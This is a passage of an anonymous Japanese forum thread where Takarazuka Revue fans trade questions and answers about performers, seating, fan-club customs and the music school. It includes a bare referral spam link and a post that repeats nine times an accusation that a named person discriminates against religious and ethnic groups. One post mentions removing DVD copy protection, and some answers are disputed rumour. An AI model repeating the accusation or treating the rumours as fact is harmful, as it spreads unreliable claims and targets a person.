158 :名無しさん@花束いっぱい。:2006/12/11(月) 18:44:40 ID:3eLYmTRn
宙スレは何処に引っ越したんでしょうか。ヒント下さい。

159 :名無しさん@花束いっぱい。:2006/12/13(水) 11:51:53 ID:+H1WrEuh
水さんのエロボレロって何の公演のやつでつか?

160 :名無しさん@花束いっぱい。:2006/12/13(水) 12:13:40 ID:Lq1OLtZa
今年のベルばら全ツのボレロかな。


161 :名無しさん@花束いっぱい。:2006/12/13(水) 12:52:09 ID:0WxtzdDr
トップスターの給料と二番手の給料と
バックの人(役なし)の給料
だいたいでいいので
いくらぐらいか
教えて下さい!

162 :名無しさん@花束いっぱい。:2006/12/13(水) 13:05:17 ID:R2Na1sS6
知るか

163 :名無しさん@花束いっぱい。:2006/12/13(水) 13:38:37 ID:+H1WrEuh
>>160タソ d!クス

164 :名無しさん@花束いっぱ:2006/12/13(水) 13:58:29 ID:fUw8WLsV
>>159タソ
あのボレロが見たくてTCAに全ツDVD発売をお願いしてみたけど
・・・叶いませんでした
ありゃーエロかったっす。
艶かしかったというか。

165 :名無しさん@花束いっぱい。:2006/12/13(水) 19:26:59 ID:0KSzZKdd
関東在住の者ですが
月組はお稽古始まっていますか?
教えてください

166 :名無しさん@花束いっぱい。:2006/12/13(水) 19:30:52 ID:13ClOWKN
大劇場公演のお稽古なら、もう先月から集合してますよ。

167 :名無しさん@花束いっぱい。:2006/12/13(水) 19:32:11 ID:ewoDlXxU
>>165
オマ・・…orz
正月には初日なんだぞ!

168 :名無しさん@花束いっぱい。:2006/12/13(水) 19:33:30 ID:nqJRAGPk
かしげサンがサヨナラショーで歌った
「奇跡」という曲のことを教えてください!!
誰の曲なんでしょうか??

169 :名無しさん@花束いっぱい。:2006/12/13(水) 20:11:36 ID:R2Na1sS6
知らん。

170 :名無しさん@花束いっぱい。:2006/12/13(水) 20:12:42 ID:w53y4Vv4
>>168
さだまさしさんです。

あさこさんもよく歌ってますよ。すごくいい曲です。

171 :名無しさん@花束いっぱい。:2006/12/13(水) 21:55:06 ID:nqJRAGPk
>>170サン
ありがとうございます!!
今度聞いてみます

172 :名無しさん@花束いっぱい。:2006/12/13(水) 23:15:31 ID:+H1WrEuh
>>164タソ
エロボレロDVD発売されてないんでつか…orz

CSでの放送はありますたか?

173 :名無しさん@花束いっぱい。:2006/12/13(水) 23:32:39 ID:ySbVHIwh
>172
ニュースでちょこっと流れたけど、本放送はまだ。
早ければ、来年の水大劇場お披露目に合わせて放送されるかも?


174 :名無しさん@花束いっぱい。:2006/12/14(木) 08:17:43 ID:24F8hX57
>>172タソ
ありがdです

175 :名無しさん@花束いっぱい。:2006/12/14(木) 08:20:13 ID:24F8hX57
↑スマソ間違えますた。自分に言ってどないする…orz
>>173タソ ありがdでつ。

176 :名無しさん@花束いっぱい。:2006/12/14(木) 09:22:56 ID:UAO5EK5r
今週の土曜日、初めて入り待ちとやらに参加したいと思うのですが何時頃行けはよいのでしょうか?3番手くらいまで見れればよいのですが…ちなみに写真も撮れたらなとオモっています、場所とりとかありますか?

177 :名無しさん@花束いっぱい。:2006/12/14(木) 09:49:33 ID:clZDcsQw
>176
初心者スレのテンプレ読んで。
http://hobby8.2ch.net/test/read.cgi/siki/1162967304/5


178 :名無しさん@花束いっぱい。:2006/12/14(木) 10:26:08 ID:1zHZa8jP
>176
とりあえず、公演の入り待ちか、お稽古の入り待ちかでも違うし…
いくらテンプレくそくらえのここでも、答えるのは難しいのでは?

179 :名無しさん@花束いっぱい。:2006/12/14(木) 12:47:37 ID:UAO5EK5r
177さんありがとうございますm(__)m
178さん、文章不足でしたね公演の入り待ちです。とりあえず三時間前くらいに行ってきます。

180 :名無しさん@花束いっぱい。:2006/12/15(金) 01:02:48 ID:eAz/1e+X
シャンテのお寿司屋さん、味はそこそこですか?
(年配者を連れて行きたいのですが)

181 :名無しさん@花束いっぱい。:2006/12/15(金) 01:12:38 ID:eAz/1e+X
ものすごい勢いで答えて〜m(_ _)m

182 :名無しさん@花束いっぱい。:2006/12/15(金) 02:18:06 ID:J88OCP56
食ったことないから知らん

183 :名無しさん@花束いっぱい。:2006/12/15(金) 02:52:35 ID:UeLQIK8K
シャンテはわからないが
三井ビルの地下の寿司屋はまあまあですよ。
その名も八○代寿司!


184 :180:2006/12/15(金) 06:35:07 ID:eAz/1e+X
183さん、ありがとうございました。

185 :名無しさん@花束いっぱ:2006/12/15(金) 21:09:38 ID:AWn/Qu90
宙の「家政婦協会」とは樹里さんの番組に
クミチョ&副クミチョさんが白割烹着で出演ということが語源と聞いていますが
何か家政婦協会的なこともされているんですか?
(我ながら愚問杉で涙出そう・・・orz)

186 :名無しさん@花束いっぱい。:2006/12/15(金) 21:13:24 ID:l8cgWcsm
トークしている遥か後ろで劇場のお掃除してました

187 :名無しさん@花束いっぱい。:2006/12/15(金) 21:43:26 ID:V1ss9BqH
>180
そこそこ。
それなりなおいしさです。
ただ、昼時は混雑するので落ち着かないです。

188 :名無しさん@花束いっぱい。:2006/12/15(金) 21:43:43 ID:c1S8Ip57
CS1(800ch)放映中のをこのまま見続けてる価値ありますか?

189 :名無しさん@花束いっぱい。:2006/12/15(金) 21:47:17 ID:JQ/fdgbI
知るか。

190 :名無しさん@花束いっぱい。:2006/12/16(土) 08:49:58 ID:ssmVb+sh
今日のタカラヅカニュースで宙組の千秋楽は何番目に放送されてましたか?また、何分くらいありましたか?

191 :名無しさん@花束いっぱい。:2006/12/16(土) 09:37:18 ID:kJJ044xv
>190
3つ目で9分から41分くらいまでです。

192 :名無しさん@花束いっぱい。:2006/12/16(土) 09:56:54 ID:ssmVb+sh
>191
ありがとうございました

193 :名無しさん@花束いっぱい。:2006/12/16(土) 12:21:11 ID:S213VVxe
宙スレに出てくる「うめ」って、誰のことですか?陽月華のことでしょうか?

194 :名無しさん@花束いっぱい。:2006/12/16(土) 12:59:39 ID:VW1wChNz
多分そうだと思います。陽月華さんの愛称はウメちゃんですから。

195 :185:2006/12/17(日) 01:23:47 ID:QytQKFVr
>>186タソ
呆れずにレス下さり、ありがとうございました!

196 :名無しさん@花束いっぱい。:2006/12/17(日) 21:39:59 ID:hqid5qGN
ゆかりさんって誰ですか?

197 :名無しさん@花束いっぱい。:2006/12/17(日) 22:08:36 ID:F/cjFYQG
綺華れいさんじゃない?

198 :名無しさん@花束いっぱい。:2006/12/19(火) 14:22:59 ID:9G2pgf4E
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

199 :名無しさん@花束いっぱい。:2006/12/19(火) 17:43:25 ID:VBwqhkIb
レコラージュの熱帯魚ロケットで、激しくクルクル回ってる2人ってどなた?

200 :名無しさん@花束いっぱい。:2006/12/19(火) 17:55:41 ID:30nzdqR5
OGの紫吹淳さんの本名って、
「栗原」(日経の過去記事での表記)と「棚澤」どっちが正しいんでしょう?
結婚されたんでしょうか。

201 :名無しさん@花束いっぱい。:2006/12/19(火) 18:25:01 ID:30nzdqR5
200ですが。
日経じゃなくてニッカンだったorz
そして199さんごめんなさい、レコラはわからない…。
どなたかお願いします。

202 :名無しさん@花束いっぱい。:2006/12/19(火) 18:30:21 ID:m2N1hh5x
>>200-201
リカの苗字は親の関係。
自身の結婚とかによるものではない。

203 :名無しさん@花束いっぱい。:2006/12/19(火) 18:44:18 ID:tJUBuVg0
グラフ1月号の発売日を教えてください

204 :名無しさん@花束いっぱい。:2006/12/19(火) 19:22:48 ID:W3b3l/kd
>203
20日。


205 :名無しさん@花束いっぱい。:2006/12/19(火) 19:57:34 ID:Djvg4OPP
>>199 両側から回るコだよね?上手が沙月さん。下手が大月さん。

206 :名無しさん@花束いっぱい。:2006/12/19(火) 20:17:43 ID:VBwqhkIb
ありがとー!!

207 :名無しさん@花束いっぱい。:2006/12/19(火) 20:20:35 ID:MbYTgS2N
TCA2006の「Joyful!!」の場面でマイクを持って歌っていた
娘役って誰ですか?(あすかじゃない方)

208 :名無しさん@花束いっぱい。:2006/12/19(火) 20:25:42 ID:6I8EmDhC
>>207
途中から高音で歌ってる娘役だよね。
DVDは見てないから確認できないけど、たっちんじゃない?



209 :207:2006/12/19(火) 20:33:05 ID:MbYTgS2N
>208
やっぱりそうでしょうか?
宙組観ないのでたっちんの舞台姿分からないんですよね。
とにかく物凄い歌声で気になったもので。

210 :名無しさん@花束いっぱい。:2006/12/19(火) 20:40:58 ID:UCm22CEP
和音ですね。マイクもっていた人は。

211 :207:2006/12/19(火) 20:43:42 ID:MbYTgS2N
>210
ありがとうございます。スッキリしました。

212 :名無しさん@花束いっぱい。:2006/12/19(火) 21:03:10 ID:OvPjcwKQ
大劇場1階一桁列の端っこってどの程度見辛いですか?
1階一桁列端っこと15〜18列あたりのセンターかサブセンの
交換求むって非常識ですか?

213 :名無しさん@花束いっぱい。:2006/12/19(火) 21:46:24 ID:8DMVwPr5
>>212
そういうのは人それぞれだからなあ。

214 :名無しさん@花束いっぱい。:2006/12/19(火) 21:47:29 ID:30nzdqR5
>>202
どっちも正解なんですか…。
ありがとうございました!

215 :名無しさん@花束いっぱい。:2006/12/19(火) 22:53:26 ID:4f33PIXB
誰か教えて
下さい!
もし合格したら、大阪から宝塚音楽学校の方へは通いで行っても良いんでしょうか?

216 :名無しさん@花束いっぱい。:2006/12/19(火) 22:56:59 ID:LTz3urFj
>215
必ず寮に入らなければならないかってこと?
寮外生もいるよ。阪急に乗ったりチャリンコで通ったりw

217 :名無しさん@花束いっぱい。:2006/12/19(火) 23:15:31 ID:4f33PIXB
そうなんですか!大阪からでもいいんですね。
通いは兵庫県内の人だけかとおもってました。
私、まったく寮とかのことわからなかったんで、
ずっと疑問になってたことがクリアになってうれしいです。
ありがとうございます!

218 :名無しさん@花束いっぱい。:2006/12/19(火) 23:53:46 ID:FYD/eOeK
>>217
でも、予科生は朝がめちゃ早いから
大阪からでも自宅通学はかなり厳しいらしいよ
そして、帰りもかなり遅くなるから
寮外生の親は交代で車出して迎えに行ったりしてるし
まあ、こんな話しは合格したら 参考にしてねw

219 :名無しさん@花束いっぱい。:2006/12/20(水) 13:19:23 ID:hyn5jZTe
予科も本科もチャリなんて乗れません。匠さんくらい昔なら乗れたんだろうけど、もう過去の話。
今じゃ組によっては研4位までダメなトコだってある

220 :193:2006/12/20(水) 13:30:21 ID:yIG1YLck
>>194
ありがとうございました!

221 :名無しさん@花束いっぱい。:2006/12/20(水) 18:25:29 ID:fZcmTOwt
>>219
匠さんだって異例で怒られてますからwwwwww

222 :名無しさん@花束いっぱい。:2006/12/20(水) 20:38:09 ID:MRVnFqz0
遅くなるって、学校は、6時くらいで終わるんじゃないんですか?

223 :名無しさん@花束いっぱい。:2006/12/20(水) 20:43:50 ID:Uw7/SQsF
そのままシャッ!と、帰っちゃうならね。
それも思い付かないようではなぁ…。

224 :名無しさん@花束いっぱい。:2006/12/20(水) 20:46:26 ID:MRVnFqz0
あ、生徒のみなさんは残って練習するんですね。


225 :名無しさん@花束いっぱい。:2006/12/20(水) 21:14:53 ID:hyn5jZTe
>224
本気で言ってるの?

226 :名無しさん@花束いっぱい。:2006/12/20(水) 22:31:37 ID:MRVnFqz0
はい。すみません、

227 :名無しさん@花束いっぱい。:2006/12/20(水) 23:00:12 ID:Uw7/SQsF
宝塚が好きになって、宝塚音楽学校を、知りたいなら、まず公式HP。
それから検索をかけて見て歩く。ここにも該当スレあります。携帯でも検索できます。

現役のジェンヌさんたち、音校生の皆さんが、どれくらいレッスンを重ねられているか、素人には想像もできないモノ。

音楽学校を受験できるくらいのかたかなぁと思いますが、ここで聞くより、まず調べましょうヨ。
「知らん!」と言われても仕方ないスレッドで、けっこう丁寧な答えだと思いますよ。

228 :名無しさん@花束いっぱい。:2006/12/21(木) 19:05:05 ID:vXVteY8T
はい、そうですよね!
今から、情報集めていきます。
有難うございました。


229 :名無しさん@花束いっぱい。:2006/12/22(金) 16:01:06 ID:rQzCl3uK
花組全ツの千秋楽、『うたかたの恋』のかくれんぼの場面で、オサさんが
「久しぶりだなそれ、マリー!」
とおっしゃってましたが、元ネタが分かりませんでした。何が久しぶり
だったのでしょうか。

230 :名無しさん@花束いっぱい。:2006/12/22(金) 16:27:34 ID:cCbAWt7R
朝海さんのライブ中継に行く予定なんですが中継が終了するのは何時くらいになるでしょうか?
サヨナラショーと退団者挨拶で一時間として5時半くらいかと予想したのですがもっと遅くなりますか?
もちろん、アンコール回数によって中継終了時間が変わるのは分かっているのですが
過去の中継にいかれた方でだいたいの時間を参考までにお聞かせ願えればと思います。
よろしくお願いします。

231 :名無しさん@花束いっぱい。:2006/12/22(金) 16:40:37 ID:9DAuXo4R
スカイステージの番組を録画したDVDだけパソコンで見る事が出来ないのですが、皆さんはご覧になれますか?
ファイナライズもちゃんとしています。

232 :名無しさん@花束いっぱい。:2006/12/22(金) 16:49:31 ID:k+q4MHSF
>229
かくれんぼって確か「怪人ごっこ」ですよね。
あれは今年の6〜10月にしていたファントムの再現です。
そのために「久しぶり」と言うわけです。

>231
スカステを録画するときにコピーガードが入ったままだと
パソコンで見られない場合もあります。
CPRM対応の再生ソフトなら見られるかと思われます。
私の場合はコピーガードをはずしてDVDに焼くので見ることが出来ますけど…

233 :名無しさん@花束いっぱい。:2006/12/22(金) 16:57:43 ID:9DAuXo4R
>232
こんなに早く対応して下さり、ありがとうございます。

234 :名無しさん@花束いっぱい:2006/12/22(金) 18:01:09 ID:6jxarRdG
今日のBSを見てどうしても知りたくなってしまったので
どうぞお教え下さい。
星組公演ショーの部分で♪大地を蹴り砂煙舞う〜 という歌詞
が出てくるあたりの部分を歌っている皆さんはどなた方ですか?
ゴメンナサイ、急に椅子から落ちるような感覚に・・・orz


235 :名無しさん@花束いっぱい。:2006/12/22(金) 19:13:28 ID:SSMvQE0U
あまおっち(天緒)

236 :名無しさん@花束いっぱい。:2006/12/22(金) 19:29:20 ID:rQzCl3uK
>>232
ああ、なるほど……。CSでは彩音ちゃんの「キャー!」から始まるので
何のことか全然分かりませんでした。ありがとうございました。

237 :名無しさん@花束いっぱい。:2006/12/22(金) 21:28:30 ID:qhPOzB9Q
231様
CS録る時はAVモードですよね。DVDレコーダーだったら多分どれでも見れると思います。パソ、プレーヤーでは機能(名前忘れたけど)が付いていないものは見れないのでございます。

238 :名無しさん@花束いっぱい。:2006/12/22(金) 22:04:51 ID:YJkCwt9b
232タンがあっさり答えてるのに、
不確かな内容を殊更いう感覚がわからん。
まるでharuみたいだな。

239 :234:2006/12/23(土) 05:45:20 ID:wVHsf4Cs
>>235タソ
ありがとうございました。
あの辺次々と歌う皆さんのハーモニーが全部・・・スゴイw

240 :名無しさん@花束いっぱい。:2006/12/23(土) 10:00:59 ID:Gbkv1yBW
シバのあの場面は、歌うまい人でも難しいような曲を、歌なんか
全然得意じゃない退団者とか入れて歌わせてたからね・・・

241 :名無しさん@花束いっぱい。:2006/12/23(土) 12:46:30 ID:j5bRM2pt
>>230
中継は会場の都合だとおもうけど、いくらアンコールが続いても
キッチリ時間で切るようです。
わたるさんの時もそうでした。


242 :名無しさん@花束いっぱい。:2006/12/24(日) 10:34:27 ID:xTWOK48D
しょうもない質問ですが、男1が、相手役である娘1をいじめたりするって事、あるんでしょうか?


243 :名無しさん@花束いっぱい。:2006/12/24(日) 11:27:31 ID:nzq0L8mT
>242
たまにはな。

244 :名無しさん@花束いっぱい。:2006/12/24(日) 23:04:12 ID:LoSW+TeW
お茶飲み会は、早くて研何年から開いてますか?

245 :名無しさん@花束いっぱい。:2006/12/24(日) 23:56:51 ID:nzq0L8mT
知らん。

246 :名無しさん@花束いっぱい。:2006/12/25(月) 11:19:57 ID:RgFQzbl0
今からコムまーにお手紙(郵送)って無理かな?
ムラ宛なら間に合うかな?(何回か劇団に顔出すんだよね?)

247 :名無しさん@花束いっぱい。:2006/12/25(月) 11:58:23 ID:xgPQ7/WV
退団日までしか受け付けない、っていうのが公式見解だよ。
絶対ダメ、送っても捨てる!のかどうかは知らないが・・・。

248 :名無しさん@花束いっぱい。:2006/12/25(月) 12:47:53 ID:TrtExErB
ここか初心者スレかに、残務整理みたいなことで来られるときに渡されるってあった。
あくまで残務整理に来られれば…だろう。

249 :名無しさん@花束いっぱい。:2006/12/25(月) 17:49:13 ID:RgFQzbl0
そうかー…

コムまー共に芸能活動を匂わせてるから、
その時の所属事務所にした方が懸命かな?

250 :名無しさん@花束いっぱい。:2006/12/25(月) 18:51:04 ID:TnvOUaoA
>>249
所属事務所か公演中の劇場に送るのが良いな
劇団に送った場合、運が良ければ渡してもらえる可能性もあるが
運が悪けりゃ捨てられるだけだ

251 :名無しさん@花束いっぱい。:2006/12/25(月) 22:00:21 ID:Kw7aUPOy
「レビューオブドリームス」でカットされていたかなみんの歌というのは、
砂漠の女の歌ですか?

252 :名無しさん@花束いっぱい。:2006/12/25(月) 22:45:40 ID:5HFtVz9F
>>251
砂漠の場面ではなくて、ロケットの後にあった娘役のみの場面です

253 :名無しさん@花束いっぱい。:2006/12/25(月) 23:03:34 ID:Kw7aUPOy
>>252
ありがとうございました。


254 :名無しさん@花束いっぱい。:2006/12/26(火) 00:09:46 ID:xK4wwSEK
東宝の座席について劇場に電話したら6列目から段がつくと言われました。
じゃあ5列まではスロープなの?フラットなの?ってつっこんだら
モニョられてしまったので、どなたかご存知の方教えてください。
ばぁちゃん連れて行くんで埋もれちゃわないか心配で…

255 :名無しさん@花束いっぱい。:2006/12/26(火) 11:33:22 ID:mG/ws9F0
完全フラットではないけど斜め度は低いゆるいスロープ、って感じ。
お祖母さまの座高が心配ならあまり厚くない座布団(椅子用)を持参してみたら?
小さい子供だったら劇場で座布団を貸してくれるけど、お年寄りだと無理かもねぇ。
でも、よっぽど小柄じゃない限りは大丈夫だと思うよ。
(友人は150cmだけど普通に見てるよ)

256 :名無しさん@花束いっぱい。:2006/12/26(火) 23:56:14 ID:fBFGBK+Z
きほちゃん、組替えを断ったから退団、とよくここで見たんですが、
どの組に組替えだったのかはわかってないですか?

私が情報通さんを見逃してるだけでしょうか?

257 :名無しさん@花束いっぱい。:2006/12/26(火) 23:56:50 ID:yDgKAOWh
>256
それは単なる噂でほんとに組替えの話があったかどうかは
わかりません

258 :名無しさん@花束いっぱい。:2006/12/27(水) 04:07:07 ID:i5t87sSk
ありがとうです

259 :名無しさん@花束いっぱい。:2006/12/27(水) 06:09:03 ID:JtJjkFeM
なんでキムシンは、ヅカファンの願望を打ち砕くようなことばかり
するのですか?

260 :名無しさん@花束いっぱい。:2006/12/27(水) 06:16:57 ID:YV4oqvhl
禿げてるからじゃない?

いや、知らん。

261 :名無しさん@花束いっぱい。:2006/12/27(水) 09:14:59 ID:PYyPGmOm
キムシンだから…でしょ。






でもどっかの信用金庫みたいな略だな。
キムシン、ウエシン…どちらも預けたら目減りしそうなとこだw

262 :名無しさん@花束いっぱい。:2006/12/27(水) 10:01:26 ID:2xDjVAWv
自分では意外性とか独自性をうちたててると思ってるんデソ

>261 うまい!

263 :名無しさん@花束いっぱい。:2006/12/27(水) 13:55:48 ID:XH/TxqBu
今までのジェンヌの中で最低身長は何cm?

264 :名無しさん@花束いっぱい。:2006/12/27(水) 14:39:11 ID:ze0uMll9
鯖ばっかよんでる連中の身長なんか知るか。

265 :名無しさん@花束いっぱい。:2006/12/27(水) 16:47:01 ID:jKSlk0q2
ポッポさんとは、誰(何)のことですか?
また、花組「エンター・ザ・レビュー」の中でおささんが「ポッポさん・・・私・・・
きれい?」と言っているのと同一人物でしょうか?
ご存知の方、レスお願いします。

266 :名無しさん@花束いっぱい。:2006/12/27(水) 17:18:09 ID:8FrZ/Nfu
>265
ほかのスレでも「○○って誰?」って聞いてますが、
まずはGoogleやYahoo!等で自力で調べる努力をしましょうよ。

とりあえず、今回は答えますが。
元宙組(宙の前は花、その前は星組)の貴柳みどりさん。
同一人物です。

267 :名無しさん@花束いっぱい。:2006/12/27(水) 17:42:00 ID:wVNYpaBJ
スレ違いだがついでだから言わせてくれ。

ID:jKSlk0q
教えてちゃんで初心者なのに
あんなスレやこんなスレを故意にageるのやめてください。

すみません逝ってきます。

268 :sage:2006/12/27(水) 20:46:11 ID:8CDFNpUe
>240
「お茶会」は研○からと決まっているけれど、「お茶飲み会」は決まっていないので
研1から開いてよし。
下級生のお茶飲み会参加者はファンというより、入団前からの知り合い多し

>246
退団した後も雑務(保険証返したり)で劇団に行くので、お手紙が届く可能性は皆無ではない
特に今回は年末年始休暇前にこむまーが劇団に行くとは思われないので、可能性高いかも
(100%受け取ってもらえるとは言えない)

269 :名無しさん@花束いっぱい。:2006/12/27(水) 20:47:02 ID:8CDFNpUe
sage間違えた…OTL

270 :名無しさん@花束いっぱい。:2006/12/27(水) 21:41:28 ID:fkWPLCg+
>268タソのを読んで、劇団に健康保険組合があることにびっくり
やっぱ阪急の健保なのか てっきり国保かと思ってたよ…

ということは年金基金もあって給与天引きされて…

271 :名無しさん@花束いっぱい。:2006/12/27(水) 22:21:05 ID:XheAhrhd
お茶会とお茶飲み会の違いはなんですか?

272 :名無しさん@花束いっぱい。:2006/12/27(水) 22:53:37 ID:8CDFNpUe
ファンクラブの登録をしてから開催するのが「お茶会」
ファンクラブの登録してないで開催するのが「お茶飲み会」
ちなみに登録した後でも、バウや青年館、中日、博多座公演等、
本公演以外でファンクラブ会員限定で行われる「親睦会」もある。
「親睦会」は忙しいと生徒さんが来ないこともある。

273 :名無しさん@花束いっぱい。:2006/12/27(水) 22:55:06 ID:8CDFNpUe
>270
定年退団された方は65歳から年金生活なのですよ

274 :名無しさん@花束いっぱい。:2006/12/28(木) 01:01:22 ID:Q09FFtFY
前、youtubeで、雪組の「理事×コム ドリームキングダム」
というのを見たんだけど、(美穂さんの歌で始まってコムがソファに寝てて、高級マダムと絡んでるとこに
薔薇収集家の理事登場)あの場面ってDVDでは映像のみなの?

275 :名無しさん@花束いっぱい。:2006/12/28(木) 09:52:20 ID:O7oo9twS
お稽古入りの会のスタンバイ時間に遅刻だったら
行かない方がいいですか?

276 :名無しさん@花束いっぱい。:2006/12/28(木) 09:59:36 ID:bieD56Q8
>274
その通り。

>275
贔屓に会いたければ行け。



277 :名無しさん@花束いっぱい。:2006/12/28(木) 10:08:33 ID:O7oo9twS
>275タソ d!
そりゃ会いたいに決まってる!!!ってことで行ってきまつ
もいっこすみません。その場合、会のとこ行っても大丈夫ですか?

278 :名無しさん@花束いっぱい。:2006/12/28(木) 10:23:45 ID:IHLlQFVU
>277
もう遅いだろうけど
会の所に行かなきゃ意味ないよ。見るだけならギャラリーでもいいだろうけどさ
つか私の贔屓の場合スタンバイから10分位で来るけど…間に合うといいね


279 :名無しさん@花束いっぱい。:2006/12/28(木) 16:01:49 ID:Ih64aP0l
>>272
サンクスです!!
やっとスッキリしました。

280 :名無しさん@花束いっぱい。:2006/12/30(土) 09:35:19 ID:ZgOGwa0D
グランドベルフォーリーに高嶺ふぶきさんが特別出演してますが
何か他組の人が出るような企画な年とかだったんですか?

281 :名無しさん@花束いっぱい。:2006/12/30(土) 10:28:11 ID:yvoo05Tx
のんちゃんショーが弱かったからね。
組子だけじゃ持たないと危惧されたらしい。
・・・そういうオイラはのんちゃんファン。

282 :名無しさん@花束いっぱい。:2006/12/30(土) 11:24:13 ID:eI3arWza
>281
嘘書くな。
風花、真琴、姿月もいるのにもたねーわけねーだろ。
>280
あの年は劇団が勝手にレビュールネサンスとか決めて
グランド〜は一発目だったから他トップが数日ずつゲスト出演した。

283 :名無しさん@花束いっぱい。:2006/12/30(土) 12:41:41 ID:ZgOGwa0D
ありがとうございます
確かに組子さんたち豪華でしたね

284 :名無しさん@花束いっぱい。:2006/12/31(日) 21:09:28 ID:+1DScWQ9
明日はムラの阪急百貨店は開いてますか?

285 :名無しさん@花束いっぱい。:2006/12/31(日) 22:17:13 ID:soNUN1qL
阪急百貨店の公式見れば?

286 :名無しさん@花束いっぱい。:2007/01/03(水) 10:42:57 ID:BISrP6Ug
宙の「NEVER〜」で開始30分〜1時間?くらいのところで、
戦う民衆?たちの中央に立って歌っていた娘役がいたのですが、
あれは誰だったのでしょう。
宙組、全然知らないのでごめんなさい。

287 :名無しさん@花束いっぱい。:2007/01/03(水) 18:18:52 ID:c5u5orDm
>286
和音美桜=たっちん

288 :名無しさん@花束いっぱい。:2007/01/04(木) 14:38:43 ID:FCFLtj3X
お稽古の時の出って具体的に何をするんですか?
持ち物は何かありますか?一人参加でも大丈夫でしょうか?

289 :名無しさん@花束いっぱい。:2007/01/04(木) 15:21:05 ID:koq1l0h4
お手紙渡し、お見送り。でした。
持ち物? スタンプカードがあったりなかったり…
生徒さんによって違いますか?
私も一人参加でしたから 無問題でしょう。

290 :名無しさん@花束いっぱい。:2007/01/04(木) 15:34:30 ID:MaFkxHGl
四季で活躍されている元宝塚の大平敦子さんと有永美奈子さんの、宝塚時代の名前と組を教えていただけないでしょうか?


291 :名無しさん@花束いっぱい。:2007/01/04(木) 16:15:43 ID:+yAtX2e2
>287
286です。ありがとうございました。凄い歌声でした。


292 :名無しさん@花束いっぱい。:2007/01/04(木) 16:34:16 ID:FCFLtj3X
>>289タソ
ありがとうございます!

293 :名無しさん@花束いっぱい。:2007/01/04(木) 16:53:33 ID:VzKdr0IX
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。
開店花火は創価学会員を差別し、韓国人を差別し、黒人を差別します。

294 :名無しさん@花束いっぱい。:2007/01/04(木) 17:47:45 ID:rvPCaIFR
>290 「(名前) 宝塚」でググってから出直して来やがれ!



大平敦子=千紘れいか(ちひろ・れいか)
有永美奈子=未宙星沙(みひろ・せいさ)

295 :名無しさん@花束いっぱい。:2007/01/04(木) 17:48:35 ID:TPeKApiQ
ツンデレktkr

296 :名無しさん@花束いっぱい。:2007/01/04(木) 18:53:00 ID:FFXlmSGH
新人公演を観劇するトップさんたちって、15列センター辺りに座ると聞いたことあるんですが本当ですか?
月新公、そのあたりの席を持っているもんで・・・。

297 :名無しさん@花束いっぱい。:2007/01/04(木) 19:28:14 ID:h5If/Olc
上級生はもっと前の上手だよ。
東宝なら4列51番からが通例。

298 :名無しさん@花束いっぱい。:2007/01/04(木) 19:32:50 ID:FFXlmSGH
>>297
そうなんですか?ありがとうございます。

299 :名無しさん@花束いっぱい。:2007/01/04(木) 19:45:18 ID:MaFkxHGl
>>294
ありがとうございました。


300 :名無しさん@花束いっぱい。:2007/01/05(金) 16:23:25 ID:uKplhQrd
300

301 :名無しさん@花束いっぱい。:2007/01/06(土) 13:19:12 ID:CTExwgqU
銀歯のジェンヌっていますか?


302 :名無しさん@花束いっぱい。:2007/01/06(土) 18:59:38 ID:Cq5AiuO3
「宝塚歌劇関連出版物編集者募集」
って毎年あるの?

303 :名無しさん@花束いっぱい。:2007/01/06(土) 20:01:01 ID:sMgTa7Au
>301>302
知らん。

304 :名無しさん@花束いっぱい。:2007/01/06(土) 21:37:37 ID:s9fKGs/6
>301
「銀歯がはずれて歯医者に〜」ってトークを聞いたことある。
誰だったか忘れたけど。

>302
毎年ではない。

305 :名無しさん@花束いっぱい。:2007/01/07(日) 02:45:50 ID:9zL2un14
>>296、297
もっと前で観劇ってどこのトップさんだw
ウチの組では東宝は見ないよ。
ムラでは13〜15の上手です。
東宝は席ないし、大抵見ないよ。

306 :名無しさん@花束いっぱい。:2007/01/07(日) 02:49:11 ID:9zL2un14
あげてもうた…スマソ

307 :名無しさん@花束いっぱい。:2007/01/07(日) 04:41:15 ID:Am99vhCO
ウチの組ってww おまえの組かよwwwww

308 :名無しさん@花束いっぱい。:2007/01/07(日) 05:44:07 ID:NWGyZzz6
銀歯の方もいるんですねー。>>304様、有難うございます。


309 :名無しさん@花束いっぱい。:2007/01/07(日) 05:54:54 ID:jcR4qirX
305
どこの組?新公見ない組ってあるんだ。初めて聞いた

310 :名無しさん@花束いっぱい。:2007/01/07(日) 09:16:48 ID:NMHVFb+Y
どの組も東宝の新公はみてるけど、
トップさんが居ないのは見たことないなぁ。
席は前方上手ブロックで開演ちょい前に並んで入場してるよね。

311 :名無しさん@花束いっぱい。:2007/01/07(日) 10:06:18 ID:UwS7ILDw
タカ(ハナ)は客席ではなく、袖で観てたこと何回かあったよ。
何かで本人が言ってた。

312 :名無しさん@花束いっぱい。:2007/01/07(日) 10:16:06 ID:pKu/H/3/
一路さんと大地さんって何年目でトップになられたんですか?

313 :名無しさん@花束いっぱい。:2007/01/07(日) 11:17:20 ID:q9Hwwzo8
>312
一路さんは研12じゃないか。
大地さんがわからないんでageておきます。

314 :名無しさん@花束いっぱい。:2007/01/07(日) 12:38:36 ID:SDvvPTBy
大地さん 73年4月初舞台。82年10月トップお披露目。85年8月退団。
一路さん 82年4月初舞台。93年5月トップお披露目。96年6月退団。

315 :名無しさん@花束いっぱい。:2007/01/07(日) 14:58:34 ID:pKu/H/3/
>>313>>314
ありがとうございます!!
やっとスッキリ出来ました。

316 :名無しさん@花束いっぱい。:2007/01/07(日) 17:44:21 ID:yEBcOB91
オサさんのCD発売についての情報を教えてください!!
発売日は決まってますか??

317 :名無しさん@花束いっぱい。:2007/01/07(日) 17:48:50 ID:NMHVFb+Y
公式みろっ。









2月9日とかいてあるぞっ。

318 :名無しさん@花束いっぱい。:2007/01/07(日) 17:51:55 ID:yEBcOB91
>317
ありがとうございます。
公式見れなくて…
わかりました。

